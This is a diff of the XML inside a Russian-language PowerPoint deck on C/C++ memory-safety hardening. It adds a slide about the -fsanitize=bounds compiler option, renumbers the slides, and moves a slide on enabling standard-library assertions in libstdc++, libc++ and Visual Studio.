-    <p:sldId id="296" r:id="rId38"/>
-    <p:sldId id="297" r:id="rId39"/>
-    <p:sldId id="298" r:id="rId40"/>
-    <p:sldId id="300" r:id="rId41"/>
-    <p:sldId id="301" r:id="rId42"/>
-    <p:sldId id="302" r:id="rId43"/>
-    <p:sldId id="299" r:id="rId44"/>
-    <p:sldId id="303" r:id="rId45"/>
-    <p:sldId id="304" r:id="rId46"/>
-    <p:sldId id="305" r:id="rId47"/>
-    <p:sldId id="306" r:id="rId48"/>
-    <p:sldId id="307" r:id="rId49"/>
-    <p:sldId id="308" r:id="rId50"/>
-    <p:sldId id="309" r:id="rId51"/>
-    <p:sldId id="310" r:id="rId52"/>
-    <p:sldId id="311" r:id="rId53"/>
-    <p:sldId id="312" r:id="rId54"/>
-    <p:sldId id="313" r:id="rId55"/>
-    <p:sldId id="314" r:id="rId56"/>
-    <p:sldId id="315" r:id="rId57"/>
-    <p:sldId id="316" r:id="rId58"/>
-    <p:sldId id="317" r:id="rId59"/>
-    <p:sldId id="318" r:id="rId60"/>
-    <p:sldId id="319" r:id="rId61"/>
-    <p:sldId id="320" r:id="rId62"/>
-    <p:sldId id="321" r:id="rId63"/>
-    <p:sldId id="322" r:id="rId64"/>
-    <p:sldId id="323" r:id="rId65"/>
-    <p:sldId id="324" r:id="rId66"/>
-    <p:sldId id="325" r:id="rId67"/>
-    <p:sldId id="326" r:id="rId68"/>
-    <p:sldId id="327" r:id="rId69"/>
-    <p:sldId id="328" r:id="rId70"/>
-    <p:sldId id="329" r:id="rId71"/>
-    <p:sldId id="330" r:id="rId72"/>
-    <p:sldId id="331" r:id="rId73"/>
-    <p:sldId id="271" r:id="rId74"/>
-    <p:sldId id="270" r:id="rId75"/>
+    <p:sldId id="332" r:id="rId35"/>
+    <p:sldId id="293" r:id="rId36"/>
+    <p:sldId id="294" r:id="rId37"/>
+    <p:sldId id="295" r:id="rId38"/>
+    <p:sldId id="296" r:id="rId39"/>
+    <p:sldId id="297" r:id="rId40"/>
+    <p:sldId id="298" r:id="rId41"/>
+    <p:sldId id="300" r:id="rId42"/>
+    <p:sldId id="301" r:id="rId43"/>
+    <p:sldId id="302" r:id="rId44"/>
+    <p:sldId id="299" r:id="rId45"/>
+    <p:sldId id="303" r:id="rId46"/>
+    <p:sldId id="304" r:id="rId47"/>
+    <p:sldId id="305" r:id="rId48"/>
+    <p:sldId id="306" r:id="rId49"/>
+    <p:sldId id="307" r:id="rId50"/>
+    <p:sldId id="308" r:id="rId51"/>
+    <p:sldId id="309" r:id="rId52"/>
+    <p:sldId id="310" r:id="rId53"/>
+    <p:sldId id="311" r:id="rId54"/>
+    <p:sldId id="312" r:id="rId55"/>
+    <p:sldId id="313" r:id="rId56"/>
+    <p:sldId id="314" r:id="rId57"/>
+    <p:sldId id="315" r:id="rId58"/>
+    <p:sldId id="316" r:id="rId59"/>
+    <p:sldId id="317" r:id="rId60"/>
+    <p:sldId id="318" r:id="rId61"/>
+    <p:sldId id="319" r:id="rId62"/>
+    <p:sldId id="320" r:id="rId63"/>
+    <p:sldId id="321" r:id="rId64"/>
+    <p:sldId id="322" r:id="rId65"/>
+    <p:sldId id="323" r:id="rId66"/>
+    <p:sldId id="324" r:id="rId67"/>
+    <p:sldId id="325" r:id="rId68"/>
+    <p:sldId id="326" r:id="rId69"/>
+    <p:sldId id="327" r:id="rId70"/>
+    <p:sldId id="328" r:id="rId71"/>
+    <p:sldId id="329" r:id="rId72"/>
+    <p:sldId id="330" r:id="rId73"/>
+    <p:sldId id="331" r:id="rId74"/>
+    <p:sldId id="271" r:id="rId75"/>
+    <p:sldId id="270" r:id="rId76"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -11181,6 +11182,173 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA1430F-BE9D-4DC4-8569-0A4451014AE9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=bounds</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0697734-E16B-494D-8832-44823EB86231}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подход фортификации можно расширить на скалярные обращения к массивам известной длины</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опция компилятора </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=bounds</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для некоторых критичных модулей</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Android Developers Blog: System hardening in Android 11</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Нет накладных расходов при компиляции </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CGBuiltin.cpp </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компилятором </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>как такое может быть</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1515280932"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B0CBE4-9961-4D8C-87A4-F78CBA37BC72}"/>
               </a:ext>
             </a:extLst>
@@ -11246,7 +11414,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11789,7 +11957,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide36.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -12018,7 +12186,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide37.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -12268,7 +12436,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide38.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -12433,261 +12601,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092177488"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide39.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Libstdc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++:</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(дефолтная </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++: -D_LIBCPP_HARDENING_MODE=...</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>включается в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>по флагу </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>stdlib</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>=</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>libc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>++)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, Ubuntu </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по умолчанию для пакетов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>но не для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Google: Chrome and server systems</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3642710049"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -12911,6 +12824,261 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88930F68-01D6-4DFC-8C4B-096056195DAD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDEFA53E-F74E-4729-8A65-412D2CAD0540}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Libstdc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>++:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>D_GLIBCXX_ASSERTIONS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(дефолтная </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Libc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>++: -D_LIBCPP_HARDENING_MODE=...</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>включается в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>по флагу </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>stdlib</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>libc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>++)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Visual Studio: -D_ITERATOR_DEBUG_LEVEL=1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>По умолчанию не включена в компиляторах в дистрибутивах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по умолчанию для пакетов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>но не для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Google: Chrome and server systems</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Retrofitting spatial safety to hundreds of millions of lines of C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3642710049"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1842F7A-9200-46E5-9FC2-73C39E243D0B}"/>
               </a:ext>
             </a:extLst>
@@ -12973,7 +13141,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide41.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -13521,7 +13689,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide42.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide43.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14159,7 +14327,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide43.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide44.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14412,7 +14580,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide44.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide45.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14538,7 +14706,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide45.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide46.xml><?xml version="1.0" encoding="utf-8"?>
